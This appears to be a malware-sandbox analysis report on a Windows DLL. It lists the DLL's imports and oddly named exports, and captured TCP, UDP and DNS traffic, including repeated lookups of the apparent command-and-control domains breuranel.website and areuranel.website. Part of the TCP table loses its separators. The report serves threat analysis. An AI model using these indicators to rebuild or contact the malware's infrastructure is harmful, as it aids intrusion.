MSACM32.dll | acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

Exports

Name | Ordinal | Address
BeGrass | 1 | 0x10016020
Fieldeight | 2 | 0x100162f0
Often | 3 | 0x10016510
Townenter | 4 | 0x100167a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 11, 2021 22:36:11.910393953 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:11.910442114 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:11.910551071 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:11.917790890 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:11.917829990 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.230382919 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.230546951 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.232964039 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.232984066 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.233254910 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.286731005 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.602170944 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.643145084 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.721329927 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.721457958 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.721606016 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.724698067 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.724731922 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:12.724807024 CEST | 49749 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:12.724817991 CEST | 443 | 49749 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.102114916 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.102155924 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.102277040 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.107418060 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.107444048 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.417006969 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.417323112 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.420845032 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.420875072 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.421394110 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.474937916 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.736295938 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.779138088 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.850306988 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.850389957 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.850682974 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.851439953 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.851459980 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:15.851707935 CEST | 49751 | 443 | 192.168.2.7 | 13.82.28.61
Oct 11, 2021 22:36:15.851723909 CEST | 443 | 49751 | 13.82.28.61 | 192.168.2.7
Oct 11, 2021 22:36:53.921871901 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:53.921917915 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:53.922110081 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:53.923199892 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:53.923233986 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.435806990 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.436101913 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:54.443348885 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:54.443380117 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.443772078 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.453095913 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:54.499135971 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.628427982 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.628509998 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
Oct 11, 2021 22:36:54.628662109 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:54.628916025 CEST | 49771 | 443 | 192.168.2.7 | 40.97.161.50
Oct 11, 2021 22:36:54.628933907 CEST | 443 | 49771 | 40.97.161.50 | 192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.628943920 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.628948927 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.667889118 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.667924881 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.668015003 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.668761015 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.668777943 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.761538029 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.761698961 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.764465094 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.764482975 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.764735937 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.766802073 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.795010090 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.795075893 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.795239925 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.795471907 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.795490026 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.823173046 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.823204041 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.823483944 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.825366974 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.825376987 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.921787977 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.921941042 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.927278996 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.927294970 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.927764893 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.930484056 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.965636969 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.965734005 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.966160059 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.966181040 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.966197968 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.967273951 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.967287064 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:57.605314016 CEST49774443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:57.605459929 CEST4434977440.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:57.606916904 CEST49774443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:57.606964111 CEST49774443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:57.606973886 CEST4434977440.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:58.118561983 CEST4434977440.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:58.118807077 CEST49774443192.168.2.740.97.161.50

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 11, 2021 22:36:11.873414993 CEST | 58562 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:11.889411926 CEST | 53 | 58562 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:12.732743025 CEST | 56590 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:15.069077015 CEST | 60501 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:15.090919018 CEST | 53 | 60501 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:15.857944012 CEST | 53775 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:33.598215103 CEST | 54640 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:33.618416071 CEST | 53 | 54640 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:36.658934116 CEST | 60338 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:36.675554037 CEST | 53 | 60338 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:53.875499010 CEST | 64569 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:53.893239975 CEST | 53 | 64569 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:54.639195919 CEST | 52816 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:54.657711029 CEST | 53 | 52816 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:54.803148031 CEST | 50781 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:54.821300030 CEST | 53 | 50781 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:57.584440947 CEST | 54230 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:57.602292061 CEST | 53 | 54230 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:58.877208948 CEST | 54911 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:58.895251036 CEST | 53 | 54911 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:36:59.030481100 CEST | 49958 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:36:59.048182011 CEST | 53 | 49958 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:37:15.299911022 CEST | 59730 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:15.320671082 CEST | 53 | 59730 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:37:19.291902065 CEST | 59310 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:19.310636997 CEST | 53 | 59310 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:37:35.954813957 CEST | 51919 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:35.972763062 CEST | 53 | 51919 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:37:36.455446959 CEST | 64296 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:39.377583027 CEST | 56680 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:39.395886898 CEST | 53 | 56680 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:37:39.848298073 CEST | 58820 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:57.013140917 CEST | 49247 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:37:57.033107042 CEST | 53 | 49247 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:00.121130943 CEST | 52286 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:00.137804031 CEST | 53 | 52286 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:17.201041937 CEST | 56064 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:17.218822002 CEST | 53 | 56064 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:17.919895887 CEST | 63744 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:17.938257933 CEST | 53 | 63744 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:18.082855940 CEST | 61457 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:18.100589991 CEST | 53 | 61457 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:20.178450108 CEST | 58367 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:20.196131945 CEST | 53 | 58367 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:20.890144110 CEST | 60599 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:20.911417961 CEST | 53 | 60599 | 8.8.8.8 | 192.168.2.7
Oct 11, 2021 22:38:21.050587893 CEST | 59571 | 53 | 192.168.2.7 | 8.8.8.8
Oct 11, 2021 22:38:21.069540977 CEST | 53 | 59571 | 8.8.8.8 | 192.168.2.7

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 11, 2021 22:36:11.873414993 CEST | 192.168.2.7 | 8.8.8.8 | 0x6aab | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:12.732743025 CEST | 192.168.2.7 | 8.8.8.8 | 0xc3cf | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:15.069077015 CEST | 192.168.2.7 | 8.8.8.8 | 0xbea1 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:15.857944012 CEST | 192.168.2.7 | 8.8.8.8 | 0xd53 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:33.598215103 CEST | 192.168.2.7 | 8.8.8.8 | 0xb926 | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:36.658934116 CEST | 192.168.2.7 | 8.8.8.8 | 0xb6fc | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.875499010 CEST | 192.168.2.7 | 8.8.8.8 | 0x52b6 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.639195919 CEST | 192.168.2.7 | 8.8.8.8 | 0x281a | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.803148031 CEST | 192.168.2.7 | 8.8.8.8 | 0xe20f | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.584440947 CEST | 192.168.2.7 | 8.8.8.8 | 0xf028 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:58.877208948 CEST | 192.168.2.7 | 8.8.8.8 | 0xe9ce | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:59.030481100 CEST | 192.168.2.7 | 8.8.8.8 | 0x3b2e | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:15.299911022 CEST | 192.168.2.7 | 8.8.8.8 | 0x9968 | Standard query (0) | areuranel.website | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:19.291902065 CEST | 192.168.2.7 | 8.8.8.8 | 0x5d7e | Standard query (0) | areuranel.website | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:35.954813957 CEST | 192.168.2.7 | 8.8.8.8 | 0xe451 | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:36.455446959 CEST | 192.168.2.7 | 8.8.8.8 | 0xe936 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:39.377583027 CEST | 192.168.2.7 | 8.8.8.8 | 0x173d | Standard query (0) | msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:39.848298073 CEST | 192.168.2.7 | 8.8.8.8 | 0xec9d | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:37:57.013140917 CEST | 192.168.2.7 | 8.8.8.8 | 0x1d30 | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:00.121130943 CEST | 192.168.2.7 | 8.8.8.8 | 0x454f | Standard query (0) | breuranel.website | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.201041937 CEST | 192.168.2.7 | 8.8.8.8 | 0xe5e8 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:17.919895887 CEST | 192.168.2.7 | 8.8.8.8 | 0x568a | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:18.082855940 CEST | 192.168.2.7 | 8.8.8.8 | 0xaee3 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.178450108 CEST | 192.168.2.7 | 8.8.8.8 | 0xf49 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:20.890144110 CEST | 192.168.2.7 | 8.8.8.8 | 0x1000 | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Oct 11, 2021 22:38:21.050587893 CEST | 192.168.2.7 | 8.8.8.8 | 0x8706 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 11, 2021 22:36:11.889411926 CEST | 8.8.8.8 | 192.168.2.7 | 0x6aab | No error (0) | msn.com |  | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:12.750817060 CEST | 8.8.8.8 | 192.168.2.7 | 0xc3cf | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:15.090919018 CEST | 8.8.8.8 | 192.168.2.7 | 0xbea1 | No error (0) | msn.com |  | 13.82.28.61 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:15.873788118 CEST | 8.8.8.8 | 192.168.2.7 | 0xd53 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:33.618416071 CEST | 8.8.8.8 | 192.168.2.7 | 0xb926 | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:36.675554037 CEST | 8.8.8.8 | 192.168.2.7 | 0xb6fc | Name error (3) | breuranel.website | none | none | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:53.893239975 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b6 | No error (0) | outlook.com |  | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | www.outlook.com | outlook.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | FRA-efz.ms-acdc.office.com |  | 40.101.124.210 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.97.170.66 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.657711029 CEST | 8.8.8.8 | 192.168.2.7 | 0x281a | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.97.147.178 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.97.223.66 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | HHN-efz.ms-acdc.office.com |  | 40.101.124.210 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | HHN-efz.ms-acdc.office.com |  | 40.101.124.226 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:54.821300030 CEST | 8.8.8.8 | 192.168.2.7 | 0xe20f | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.208.114 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.161.50 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.156.114 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.160.2 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.128.194 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.164.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.153.146 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.116.82 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:57.602292061 CEST | 8.8.8.8 | 192.168.2.7 | 0xf028 | No error (0) | outlook.com |  | 40.97.148.226 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | www.outlook.com | outlook.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | FRA-efz.ms-acdc.office.com |  | 40.101.124.210 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.97.170.66 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:58.895251036 CEST | 8.8.8.8 | 192.168.2.7 | 0xe9ce | No error (0) | FRA-efz.ms-acdc.office.com |  | 52.97.147.178 | A (IP address) | IN (0x0001)
Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | outlook.office365.com | outlook.ha.office365.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 11, 2021 22:36:59.048182011 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2e | No error (0) | HHN-efz.ms-acdc.office.com |  | 52.98.208.114 | A (IP address) | IN (0x0001)
